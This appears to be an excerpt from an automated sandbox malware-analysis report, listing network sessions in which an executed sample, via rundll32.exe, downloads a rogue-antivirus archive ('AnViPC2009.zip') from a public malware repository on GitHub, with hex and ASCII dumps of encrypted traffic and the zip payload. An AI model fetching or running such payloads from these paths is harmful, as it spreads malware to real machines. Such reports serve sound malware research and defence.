                                                                                                                                                    2022-09-29 12:59:06 UTC10556INData Raw: 10 89 84 c9 b9 23 0a 21 6d 0a 2b e9 3a 0e e5 37 12 39 de de 47 ca 3e 99 32 1a c1 4b 19 da 7e 56 c1 10 07 6a 20 65 39 87 13 58 50 20 80 a4 2f 2b 56 9c 54 f7 f0 64 df 79 17 9b 6e f2 c7 df 24 d4 10 2a 0b d6 df 0e 4c 03 51 9f 44 15 be de db 78 1f 8f d5 18 a9 da 92 d9 26 d1 52 1d 2e 46 36 3b f6 75 e0 d7 7b 55 1a 89 d4 a2 19 93 77 23 a4 77 5f 70 ee 68 12 b5 2a 86 fb eb e4 35 1a d8 1d f9 8f 3c 5d 8e 86 6d bc 78 f2 db 68 f8 be 56 e2 67 ee 23 a6 61 97 43 91 b0 7b 9a f9 71 c7 8b 1a 43 72 6a 35 3f 0b 68 d2 8d 6b 70 aa bf 17 9a 09 55 5d 9a 4d b7 54 fb 22 d9 5c 1e 26 c1 b1 ce ab bf 07 76 f6 67 0f 6e 2a d6 05 4f f3 1e bd 5c 37 56 00 19 80 1b 76 da 48 97 7d b8 5a cf 2a 08 05 eb f2 e8 4f 7a 45 48 9c 8b c7 eb 2a d3 35 03 b7 34 f7 ff 95 0f af d6 d9 97 db 33 78 5f a7 5c e8
                                                                                                                                                    Data Ascii: #!m+:79G>2K~Vj e9XP /+VTdyn$*LQDx&R.F6;u{Uw#w_ph*5<]mxhVg#aC{qCrj5?hkpU]MT"\&vgn*O\7VvH}Z*OzEH*543x_\
                                                                                                                                                    2022-09-29 12:59:06 UTC10572INData Raw: 04 9f 6d 42 ab 1f 67 b6 57 ce 60 e4 52 26 09 b3 58 8f 19 57 75 f6 6f 9e e8 bc 23 3f ff 70 1f 18 4f e8 44 42 63 a4 81 11 2f 4c 99 4a 61 ee 07 8a 46 18 f1 03 3c c5 07 9d 4b 42 f7 8f ff e3 13 e6 3d 7b 4b 56 09 64 ba 65 98 f1 15 04 27 9b eb c8 16 fe 9b 55 4c 6a b9 12 39 66 94 21 70 82 a6 36 2c bb 51 71 13 2c c2 ae 51 e1 14 75 cf db 2f ac 05 11 01 03 51 b8 46 8e 78 38 1c 5a da 09 4a 27 5c 42 34 a6 5f c7 7a 72 64 ce a8 c2 10 4c 03 f7 00 05 47 6e 26 1b b7 48 9c 9e 11 3e 52 34 c3 e7 73 15 05 cc 9e 3e 08 3f 6e 71 82 bc 9a d6 fe 7a 94 b1 f5 b2 3a e6 9f 9b c5 50 c6 7b 85 42 d1 0a 86 70 dc 05 ec 3b d8 f3 98 67 89 3f 3b 6e 12 13 48 1c a7 b0 ad a0 19 8c a6 fc dd 81 aa d8 4e f1 44 31 1e 49 d8 6b f2 ce 19 54 df 48 75 7e 11 04 f6 97 1d 24 8e 65 17 78 d6 40 c1 11 17 62 0f
                                                                                                                                                    Data Ascii: mBgW`R&XWuo#?pODBc/LJaF<KB={KVde'ULj9f!p6,Qq,Qu/QFx8ZJ'\B4_zrdLGn&H>R4s>?nqz:P{Bp;g?;nHND1IkTHu~$ex@b
                                                                                                                                                    2022-09-29 12:59:06 UTC10588INData Raw: fe 2d c2 6f 2d 29 e5 51 cd 06 0b 04 eb a6 78 4e 27 e6 63 e2 2f 87 7b 43 53 a8 f7 a6 bf 31 4b 13 5f 8d 59 c4 b8 1e 2a af 63 1e e2 09 74 cc fc e7 4b 18 b7 07 cc 64 44 03 be 1d 46 9d ec fb 28 a8 6d b3 36 51 a8 7b 3d 44 82 5a d9 16 5b 90 c1 bb ea a3 0f 50 45 fa af 07 ae 05 e1 20 18 90 14 a9 56 5a 4c 46 1f 30 18 f2 e9 e9 e4 f6 d6 63 d0 a7 68 e6 0e 88 96 3e e9 db ce e5 59 d5 b4 6a 56 ca d9 26 b7 d7 0b 05 b5 e0 e0 0b 5d ab 57 3c 1f 7b cf ad 9c 34 48 22 85 d3 52 c1 0f 56 40 ab 18 14 9a 34 06 40 28 23 f5 e9 52 f9 de a8 e1 11 08 f2 6d 0d a1 e5 e8 59 cf 8b 8e f0 1b 72 4b f1 84 de 58 de 90 28 07 7c ae ab 70 89 37 96 6e d8 1e 5f 02 f4 62 c1 5a a0 3b fd 2a 91 5c 72 7c 37 9e 9f 49 bc eb 2a d7 e0 bc 49 ff 23 9c a0 e2 32 ac 72 ba 76 1f f7 87 f1 ad 1c 18 ed 11 10 c8 18 e4
                                                                                                                                                    Data Ascii: -o-)QxN'c/{CS1K_Y*ctKdDF(m6Q{=DZ[PE VZLF0ch>YjV&]W<{4H"RV@4@(#RmYrKX(|p7n_bZ;*\r|7I*I#2rv
                                                                                                                                                    2022-09-29 12:59:06 UTC10604INData Raw: e3 f7 b0 19 09 2c ec 2c 9c 0f 13 80 9d 42 5d f9 e8 3d b3 92 e1 d2 ef fa e5 0d bb 75 50 55 63 4e 13 70 fd 2b 7b b6 f5 39 b6 1b f7 c9 9d 8e dc 75 20 3e 2e 04 b7 42 56 b7 b5 3e e5 5d cb 8b cf 16 95 42 3a 52 9d ab 87 f5 af c6 82 28 04 71 1f ef f5 57 ff ca 80 b8 98 58 61 6d 82 cb 07 37 e3 ea 65 05 7e ef 4d 27 56 58 d3 20 b0 d1 73 85 af 7f 2c 55 88 b4 38 3d c4 9f 74 7f 8f 79 5e 4a 22 ae 4d 06 a3 3d 43 d9 b4 6a 90 b5 4e 6a db 3f 10 ce 7b 07 97 2e 00 48 36 76 4d 79 7d 19 e0 71 14 08 ba 05 cf 2a da a2 0c f9 27 04 b3 3a 46 b3 be c1 a3 b8 34 f3 e8 4f 90 ae c9 77 e1 8a 84 a4 84 43 97 3d 95 1b 9f 7c 26 cc 2b 35 df f0 c7 86 02 a1 1b 82 47 8d be ef 09 7a de 7b 39 a3 7c ce 5f 94 b7 cd 88 c2 60 66 8c e6 9c f4 a0 ed fb dc d0 62 a3 78 cb 43 84 db 77 65 df 4a af bd 4c 3b b0
                                                                                                                                                    Data Ascii: ,,B]=uPUcNp+{9u >.BV>]B:R(qWXam7e~M'VX s,U8=ty^J"M=CjNj?{.H6vMy}q*':F4OwC=|&+5Gz{9|_`fbxCweJL;
                                                                                                                                                    2022-09-29 12:59:06 UTC10620INData Raw: 7c b5 a6 af 1e 9c 5d 6a 73 d2 25 dd d0 d6 fa 84 5c 8a 7e cc b6 80 ae 1e af 1d 0e df 7d 94 ad 1e 68 b4 83 30 0e d9 f2 30 d0 76 7f 5b 30 72 25 2f f0 87 1b 44 c0 b6 e2 89 b8 aa 16 dd a9 bb c3 25 75 ed a6 39 3e df af 45 d0 62 ef e2 73 a1 b8 35 69 ec d7 76 43 95 86 a4 87 19 5c 49 cb 13 90 b9 65 64 84 2f bd aa 22 51 a6 5a a9 b7 5b 8c 2d 41 61 df 82 7c 20 bf 39 52 9e 3a 38 6e 60 f7 03 a8 8f e3 71 7f 48 c9 97 93 d0 d1 39 fc 37 f7 4d 4b 64 8f b5 c6 2a b0 38 f1 6f 85 47 2a 51 53 94 aa 25 eb 06 1b 98 b5 89 ea 0c 03 29 2b 85 1b fa 02 32 7a 28 06 3b 66 24 e2 f1 f0 40 b5 ce 7b ff b4 fc 5c 35 5f 6c 65 e0 2f 2f 9d 0a 15 8e da 94 0c c1 43 87 a0 92 2b 3d 1f 5f 82 71 b3 b7 ad 6a 64 61 05 a6 0d 38 62 22 1d c6 ef 9b a7 92 02 4f ed ec d1 64 f3 f6 72 71 96 48 d3 db 3c 2e 7b 38
                                                                                                                                                    Data Ascii: |]js%\~}h00v[0r%/D%u9>Ebs5ivC\Ied/"QZ[-Aa| 9R:8n`qH97MKd*8oG*QS%)+2z(;f$@{\5_le//C+=_qjda8b"OdrqH<.{8
                                                                                                                                                    2022-09-29 12:59:06 UTC10636INData Raw: c4 5a 8a 9e 81 cf ca 29 6c 17 c5 e4 91 98 a2 c6 7a ce 79 d6 d9 87 6f 5f 02 ba 8a e4 36 33 36 d7 fa 3c 96 51 b2 8e 54 69 35 0c c2 49 b1 9c 01 3f 6c 75 c5 37 d5 94 44 49 7e 5a 0d db 07 3d d2 4a 6b 03 dc 4c d1 cf b7 5e 31 d5 0c 8d a0 a7 2a 8c 3c 76 de 80 84 b8 45 d7 f2 9d d4 42 4a 2c f5 93 1c 38 88 52 e6 ec d7 f0 ca 78 9d 87 8c f2 f7 90 5c 9d 9e 2d 37 c1 24 e9 34 31 58 ef 0d 21 31 7d cd 7f 98 77 a4 e4 83 48 d5 18 19 e8 1b 3e 99 9f f7 c0 16 f2 10 55 9f d9 f9 25 06 7b a4 d9 82 7c 79 d6 f9 69 21 46 c7 84 dd 84 ef 5b 8a f2 a8 67 07 1c 86 fe 9b 7e e7 35 42 38 12 0c 4c 41 97 a9 3f 5a a9 8c 0a 24 e7 df 3f e8 43 4f 38 d4 58 0c 90 90 b1 9e 81 78 5a f9 9d b2 34 39 d7 61 9a d7 5c 17 7a 5c 6f a7 2d 42 6a 71 70 55 aa c9 e6 c4 de 93 6c 08 df 74 91 e0 8f 10 8d 55 3a 64 4d
                                                                                                                                                    Data Ascii: Z)lzyo_636<QTi5I?lu7DI~Z=JkL^1*<vEBJ,8Rx\-7$41X!1}wH>U%{|yi!F[g~5B8LA?Z$?CO8XxZ49a\z\o-BjqpUltU:dM
                                                                                                                                                    2022-09-29 12:59:06 UTC10652INData Raw: 9b da 10 64 f7 14 e8 65 20 31 b2 28 fc e9 a1 19 e8 b4 ee 50 7f 77 15 56 5a 05 1c 65 a0 52 cf 36 0a 9f 69 7e 3b 33 c4 c2 7d d7 bc 78 19 41 71 7a 78 2c 32 5e b9 21 65 88 96 03 3b ac 6b a5 b6 69 4c 15 5b ea d5 ad 7a 32 35 ef 8a bf a9 19 39 b3 f6 48 70 b5 4b 6c 2d f2 ec 4d 4f 82 40 2a 5d d8 35 3a 1a 29 92 e4 35 a9 91 40 50 53 f6 1f ec 44 12 72 ea ea 45 2c 8e ea d6 01 b6 23 aa 52 a5 44 ba 20 99 d5 25 24 17 76 bb 68 e7 60 a7 41 66 ee c6 d4 14 31 8e cd 62 94 cd cf 96 5b 8a 60 6f 7d 8e a7 96 aa 98 13 50 48 76 ab 81 71 70 83 3d e2 8c d6 54 c7 71 2f 12 d5 0e 8e 5f 45 98 37 9b 1e 5d f2 9d b0 cc ea 97 db 83 5b 90 d8 00 3f 5b 9a 2c 78 1b d9 2d 98 be 51 a1 f6 04 45 41 71 0c 37 37 25 58 7d f6 7f 67 4f 2e ad 88 fe 8d c7 67 09 c9 45 dc fd 3c 6b 0a 6a 26 b4 16 73 d0 86 12
                                                                                                                                                    Data Ascii: de 1(PwVZeR6i~;3}xAqzx,2^!e;kiL[z259HpKl-MO@*]5:)5@PSDrE,#RD %$vh`Af1b[`o}PHvqp=Tq/_E7][?[,x-QEAq77%X}gO.gE<kj&s
                                                                                                                                                    2022-09-29 12:59:06 UTC10668INData Raw: f3 ff 20 64 17 aa 27 2c 0e 83 94 04 1a e4 36 62 03 45 50 cc 48 6d f9 72 f3 d0 eb 42 ec 2b cb 93 3c e7 0e 8f c8 08 1a 6e a5 0d 10 8a 23 e5 fc 87 1a e7 ae 21 8b 77 49 88 20 e2 89 13 5c d8 6f e5 3e a9 38 a5 b5 67 cf fc b0 59 71 e9 6d 29 0e 15 07 18 61 35 66 bf 01 f8 56 a4 e6 68 2a 4a 0b 09 53 4f f9 09 45 33 dd b0 6d e9 79 e7 19 df 06 cd be e6 6a 74 88 3a a5 d1 5c 7e 02 78 15 a4 6b fd ee 08 45 b3 fc 00 4d 9d 0e f0 7e 64 b8 39 a4 14 fd 43 c7 5a 0e fa 29 a2 ad ee be f3 87 91 97 79 a7 3f f3 68 54 d1 f8 7d b2 94 ef 88 c9 8d bd fe e1 41 50 ce 6e 0d ed c0 d2 d3 8e 8f 75 1b 07 8d 12 8b f6 99 6c 42 be b2 60 7c 9a 84 d6 01 53 03 7f 64 0f 30 f4 b8 bb 5b 80 5e a9 b2 08 7e b8 1f 94 bd 36 f8 9c 90 97 14 b3 6c d9 d2 3d 7a e4 75 2a f2 98 f1 2d 7d c5 49 08 df bc c6 54 fe 22
                                                                                                                                                    Data Ascii: d',6bEPHmrB+<n#!wI \o>8gYqm)a5fVh*JSOE3myjt:\~xkEM~d9CZ)y?hT}APnulB`|Sd0[^~6l=zu*-}IT"


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    73192.168.2.349744140.82.121.3443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:59:06 UTC10670OUTGET /Endermanch/MalwareDatabase/raw/master/rogues/AnViPC2009.zip HTTP/1.1
                                                                                                                                                    Host: github.com


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    74140.82.121.3443192.168.2.349744C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:59:06 UTC10670INHTTP/1.1 302 Found
                                                                                                                                                    Server: GitHub.com
                                                                                                                                                    Date: Thu, 29 Sep 2022 12:57:10 GMT
                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                    Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                    Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                    Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/AnViPC2009.zip
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                    X-Frame-Options: deny
                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                    Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                    Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                                                    2022-09-29 12:59:06 UTC10670INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                    Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    75192.168.2.349745185.199.108.133443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:59:06 UTC10672OUTGET /Endermanch/MalwareDatabase/master/rogues/AnViPC2009.zip HTTP/1.1
                                                                                                                                                    Host: raw.githubusercontent.com


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    76185.199.108.133443192.168.2.349745C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:59:06 UTC10672INHTTP/1.1 200 OK
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 1178406
                                                                                                                                                    Cache-Control: max-age=300
                                                                                                                                                    Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                    Content-Type: application/zip
                                                                                                                                                    ETag: "4b7f39242bdc3c2d1323de2cf6529b8807eb1cfe6f7dc4241f8df746b2145355"
                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                    X-Frame-Options: deny
                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                    X-GitHub-Request-Id: 0866:67BD:BA80D:1793D0:6335928F
                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                    Date: Thu, 29 Sep 2022 12:59:06 GMT
                                                                                                                                                    Via: 1.1 varnish
                                                                                                                                                    X-Served-By: cache-mxp6962-MXP
                                                                                                                                                    X-Cache: HIT
                                                                                                                                                    X-Cache-Hits: 1
                                                                                                                                                    X-Timer: S1664456347.806990,VS0,VE170
                                                                                                                                                    Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                    X-Fastly-Request-ID: c533ced13fbceeeb23437c8c46c5f30e487dda2a
                                                                                                                                                    Expires: Thu, 29 Sep 2022 13:04:06 GMT
                                                                                                                                                    Source-Age: 0
                                                                                                                                                    2022-09-29 12:59:06 UTC10673INData Raw: 50 4b 03 04 33 00 01 00 63 00 c3 5c f5 3c 00 00 00 00 58 fa 11 00 5a bb 12 00 19 00 0b 00 45 6e 64 65 72 6d 61 6e 63 68 40 41 6e 56 69 50 43 32 30 30 39 2e 65 78 65 01 99 07 00 02 00 41 45 03 08 00 18 1e 19 ad d3 ff 2d 34 78 35 ff b8 e5 42 12 9c 05 07 97 5d 8c 1a 3c eb c6 99 7d 87 2f 61 b9 e2 28 ee 82 71 5c ce 7b 7c 30 98 9b eb 94 90 c9 3c 15 7b b7 9c ba 5f ff 0a 3a ba bb f0 04 ba 43 3a ee c9 99 f4 b2 d8 3c 52 0e eb 5c 5d b2 e2 78 a5 65 02 53 2a 04 41 4d 0f 32 09 f9 96 bf d5 21 02 00 db 0f 54 dd fd 79 94 e9 75 e8 be e9 32 91 5f 70 01 4e 0b b8 02 bb c3 53 72 9f ea f9 c2 8c 2f 31 b8 0f 6f 9e 32 7f 96 1e 1d 26 00 13 55 a5 44 92 af a0 7a 25 bb ba 49 a6 1f 52 6e 15 0e 72 dd 98 30 df ba c9 10 ed e7 c7 80 d6 00 cf 6d e4 2c 60 84 51 9a 88 a2 aa d4 0c dd 3c eb db
                                                                                                                                                    Data Ascii: PK3c\<XZEndermanch@AnViPC2009.exeAE-4x5B]<}/a(q\{|0<{_:C:<R\]xeS*AM2!Tyu2_pNSr/1o2&UDz%IRnr0m,`Q<
                                                                                                                                                    2022-09-29 12:59:06 UTC10674INData Raw: f0 89 95 f9 82 16 4d 9f bc c0 c4 30 d2 18 2b 95 f7 c3 87 5c ec 63 db 65 52 73 c4 32 83 3a 07 d7 99 f3 32 e1 8f 52 02 16 a8 ad 95 19 72 b9 2f d6 2b 3a fd ec ce 99 d5 e7 be 78 09 d5 08 31 ce 3c 2b fb 48 65 13 32 23 4a b0 2b 7c ca 5f 70 6d 2f 1a af 52 17 f6 f2 61 fc 1d a6 9b 78 de 94 a1 e8 f9 ad 49 b3 30 2f 9e e4 12 5c b1 a9 26 a8 45 dc 7c c9 02 7a 32 c5 f5 95 d0 d0 7b fe 0c 0d 23 ee bd 71 20 1c 8b 68 5d a1 ce 07 fa 07 6b 00 c7 5e 7f 30 aa bd c1 5a 14 f3 25 1f 16 3e 74 27 fb 06 d0 80 52 ed e6 39 4a 9c 87 25 49 5a c5 5b 26 b8 4b d6 d4 29 c2 56 81 e8 94 e7 64 c3 f7 0e 69 db 9a ec 51 77 ba ea d2 2a 14 40 c8 c2 2f d9 64 15 d6 57 34 66 40 5b 20 e0 40 43 55 e4 27 25 c2 d5 61 03 db 15 e3 3b d4 64 49 bf 9a d1 84 a9 e8 6f 17 82 43 ad 17 4e c5 37 ac 78 04 a6 64 fd 07
                                                                                                                                                    Data Ascii: M0+\ceRs2:2Rr/+:x1<+He2#J+|_pm/RaxI0/\&E|z2{#q h]k^0Z%>t'R9J%IZ[&K)VdiQw*@/dW4f@[ @CU'%a;dIoCN7xd
                                                                                                                                                    2022-09-29 12:59:06 UTC10676INData Raw: 68 81 6a cd b0 eb 9a 8d 7f 24 a9 1c 87 f3 dd 52 f2 64 7d 9e 45 9d da 90 19 e2 2d 1c 7b 26 df 0c f0 b6 0b 93 87 34 b5 ee 6b 42 2f e0 42 81 48 f9 4c a1 06 8e 15 db d1 4b 4b 54 0e 7e 56 68 a0 ac dc 20 16 49 32 1c 3e c2 5e b0 cb 9c 01 61 bf 15 fe 84 1a 93 9b ef 26 c0 39 6b 84 7d ba d2 d8 0c ba 26 58 a4 77 fa 4f ca c9 b1 f3 4c 4f 5c 6d 2e 91 c5 a9 84 46 bf 00 97 c1 fa 82 9a 1d 54 57 ef 6c 93 0b ec 3d fd d7 d5 8a 99 f2 33 50 16 ef 9e 80 ed 5e d6 b6 23 f0 90 5d 08 13 38 54 8e 91 8e e6 ed 2f 88 93 bc 27 31 dc ff 51 5a a7 99 1b e2 06 66 d9 0e 4c 70 6a e2 06 f3 1d 6c f2 c7 5a e9 ae a3 9d 70 3c 73 c7 ec 25 b6 90 f2 11 0b e8 26 7c 7a e9 f4 cb c5 1e df 9a 76 5d 4c 65 00 b7 a7 9b 7a a1 e8 3c 09 ff a9 b5 89 93 ee fd b1 8b 9b c8 ad a3 b5 0c 70 82 51 f5 f5 2b f5 40 0c f6
                                                                                                                                                    Data Ascii: hj$Rd}E-{&4kB/BHLKKT~Vh I2>^a&9k}&XwOLO\m.FTWl=3P^#]8T/'1QZfLpjlZp<s%&|zv]Lez<pQ+@
                                                                                                                                                    2022-09-29 12:59:06 UTC10677INData Raw: 89 4c b0 e0 7d a9 1e 3c f2 11 50 95 69 af 11 35 3f 8c 13 48 1d 2b e3 c1 ce 2f 6f d4 78 46 5e ba 26 71 6d 91 b6 4a 28 a4 40 42 37 0c 09 ef 1d 5f ba 8a 7c da d1 be 33 d8 af ad 54 29 8a dd f2 58 93 86 12 f5 16 d1 c1 eb 29 18 2c 5c 00 94 1f a2 ec 0e 6f 45 91 a0 5c ca 36 d4 9a d9 17 1a 6e 85 42 5a 0b 3b 7c 97 2d 9f 8e 8a d4 ce 3f 91 f2 18 28 1d d6 fa ff d3 1a 60 29 0b 1c b7 bb f4 64 79 39 9c c9 ab f5 3e 6e 95 82 a6 ed b2 27 fb bc e1 a1 e8 47 44 1e aa 45 3d d1 49 52 38 22 9f 36 60 2c 23 b8 7d 43 63 04 bb 92 26 ff 8d d9 cc 95 27 55 c2 53 7f f7 0b fd 6b 13 b9 4b 50 ed 8d 9b 1f 7d ca 39 90 00 4e 9f c4 f6 2a c3 4f 78 73 0b 56 82 4f f8 41 37 af 22 b7 a8 fb 83 d1 41 4b 87 fa 20 26 2f 6b 20 ef 4e d3 c1 db fe d7 50 df 31 24 f6 44 a2 c7 b4 5a cb 36 28 d3 46 c1 64 f9 f7
                                                                                                                                                    Data Ascii: L}<Pi5?H+/oxF^&qmJ(@B7_|3T)X),\oE\6nBZ;|-?(`)dy9>n'GDE=IR8"6`,#}Cc&'USkKP}9N*OxsVOA7"AK &/k NP1$DZ6(Fd
                                                                                                                                                    2022-09-29 12:59:06 UTC10678INData Raw: 75 67 f7 df ce 69 be 17 7d 81 ee d1 54 1c e1 92 e7 e8 da 54 1a 42 cc 2a e0 f1 8d f5 a0 86 5a 2f 9c 05 d1 f4 52 19 ac a3 97 9e 66 88 1f 10 8e 37 da 1d 44 07 35 7d 42 cb 86 c3 96 37 ed 54 bc 51 0a 36 ae f1 55 08 6d 71 be 95 ac c1 bb 90 aa 62 9a 0b 60 45 ba e2 c4 77 ae f6 e1 f6 34 0f 12 d3 73 37 ad aa 16 9c 45 4d 7d 54 87 2a 75 2f 81 a7 02 b1 ce db 94 8c 59 83 04 38 57 ef e9 19 48 63 5e d5 80 ae 13 90 2e 5d dd c9 fb a8 14 d7 e8 72 b1 62 f0 b9 bf 84 ad 73 45 45 f8 ff f9 bc af a9 77 a0 bb f2 55 10 4a d9 7f f5 d9 17 56 2d dc 76 ff f5 88 76 29 55 35 4e 47 ab 70 6f 11 cb 2e ea c5 88 8e 7f 2b 08 a3 7f 37 9d ac af 05 88 ee be c9 04 0e c3 b2 16 0b af 9d 83 b3 85 f1 0b 24 ed cf aa 54 47 35 d8 60 d5 19 3b bf 99 01 cc 61 43 5a c4 84 d4 7e 8f 6e c4 0a 94 ba 9a f7 92 2e
                                                                                                                                                    Data Ascii: ugi}TTB*Z/Rf7D5}B7TQ6Umqb`Ew4s7EM}T*u/Y8WHc^.]rbsEEwUJV-vv)U5NGpo.+7$TG5`;aCZ~n.
                                                                                                                                                    2022-09-29 12:59:06 UTC10680INData Raw: 8f e8 8a ba 8a 7a 1e 97 1a d5 b6 e0 89 63 9e 05 b1 db 17 24 85 ee d3 69 b0 9e de 01 8e ce d1 26 fc 76 76 05 3e be a0 34 f2 ac 16 f9 24 6d a3 89 14 a5 e4 ac 75 8d d0 77 39 bb 48 36 81 0b c5 18 b7 d3 45 da 68 6e cb 48 d2 be 59 b0 a9 0b d6 84 60 92 d5 0f 62 3f 69 06 46 c1 4b 0c 14 c2 79 70 04 49 9f c9 ed c0 3c 7e f4 d9 c7 3e bc fa e9 22 35 5a 56 cf a3 83 bb 3e ad 38 e9 2e c9 63 d9 2e a7 db 9b 7c 4a ac c8 de 15 0d b8 87 88 97 74 8b 20 7c 72 67 71 bb 55 8e 7e ae 8d aa 17 31 a9 51 37 3a 7b 84 fc b5 ce e1 fe e4 cd d6 62 be 9f c5 be da 96 d0 11 bf d0 72 f4 2c 99 46 e3 b0 ed 0a 2f cb 9a b3 2f 92 17 12 95 cd 2e 8f 2a f7 76 ab b5 05 b6 d4 22 55 a7 d8 cf f5 68 70 73 8d bb 9b bf e2 9e 6f e8 32 c6 49 d0 1e ae 98 15 cd 0a 45 06 cc 11 ae a9 56 9b 7e 01 7d 10 36 7f b1 ec
                                                                                                                                                    Data Ascii: zc$i&vv>4$muw9H6EhnHY`b?iFKypI<~>"5ZV>8.c.|Jt |rgqU~1Q7:{br,F//.*v"Uhpso2IEV~}6
                                                                                                                                                    2022-09-29 12:59:06 UTC10681INData Raw: 8a ac b8 d1 29 05 19 47 48 43 69 12 1f 87 a5 64 0e d2 19 a8 e3 b0 cf 56 de df 41 9c 42 c6 67 94 a8 14 1b 3c 90 60 50 bc e0 8f 72 00 82 2a e2 32 2d e4 81 67 74 c7 e1 50 45 f0 bd d3 c6 db c2 3d b0 eb 66 98 5b a0 18 9c 61 82 27 bb 69 73 22 0e 94 69 22 ac 49 3f 2a f3 14 b4 f4 36 9e 2f 1a 26 84 e5 08 41 ca c5 27 7e b8 1f ce b0 35 83 a4 74 50 c3 c4 8f f3 53 e3 9e 30 40 e8 bc 3a 4b 37 77 bb bd c0 20 4b 16 5d 59 56 b9 45 f5 c1 9d be 8e 9a f5 3b 60 2d 80 c4 a4 8b 37 64 02 a0 46 b2 a6 d8 7e 69 5c 42 74 12 98 ee 2b 9f ec 36 27 fe 24 a5 5b da 4f 8b 9a 87 c1 f3 f5 44 85 b1 5a 9f ed 4a db ea 35 db 93 d4 f0 45 20 16 f6 6c 6e 20 cf 6d f2 cd 9f 5d b7 19 fc 6a 46 0a 9d 07 04 e5 fa d1 2a 8d b8 11 4e a2 d1 ff a3 4e 5a 56 46 75 d3 98 00 5a d1 6a 6d e0 76 06 2f 61 c2 43 dc 46
                                                                                                                                                    Data Ascii: )GHCidVABg<`Pr*2-gtPE=f[a'is"i"I?*6/&A'~5tPS0@:K7w K]YVE;`-7dF~i\Bt+6'$[ODZJ5E ln m]jF*NNZVFuZjmv/aCF
                                                                                                                                                    2022-09-29 12:59:06 UTC10682INData Raw: e9 df 1d 84 48 a4 46 6f d5 4c 87 98 a0 fc 6c c3 d8 50 11 e8 cf 2d c1 31 e3 43 72 1d 86 35 16 48 bd bd 6e 07 b9 96 bd 57 c8 9b fb 4f 81 94 c8 74 b0 55 09 f9 a1 f7 8c 2f 8f 6a 7b fd 9b bf 1b ac 99 e3 be d2 ae 41 8e 79 0e 01 e8 b0 4a ba d1 7f 78 de 35 ba 99 7f f3 9b fe 05 75 ac 07 18 f8 53 8f 34 83 0c 9f 77 3a b4 5b b1 65 04 22 58 c6 d5 bf 31 f6 81 71 d9 96 25 3b 32 b9 aa 13 14 28 ea ca 35 43 2c 11 05 a8 39 ef 46 3c bc 92 3d 6a 64 e9 fe 3e 5c 04 25 59 82 83 77 4d c9 63 c6 63 bb 55 54 d5 c8 4f a3 32 57 6c 39 bf 71 72 9f 00 64 3e 62 88 9c 07 c0 ab bd 87 a3 99 3d a4 5e aa b7 56 42 9a 60 e7 3f bb cd 7b 18 05 f7 ac 5f fc 8b f0 f4 52 89 b7 97 e9 35 bb c9 64 00 44 d8 b7 ae c6 a4 80 c5 f9 7f fa b4 09 15 c6 08 80 80 56 b4 b7 d2 47 ed a3 2c da 5e 82 31 36 db ce e7 41
                                                                                                                                                    Data Ascii: HFoLlP-1Cr5HnWOtU/j{AyJx5uS4w:[e"X1q%;2(5C,9F<=jd>\%YwMccUTO2Wl9qrd>b=^VB`?{_R5dDVG,^16A
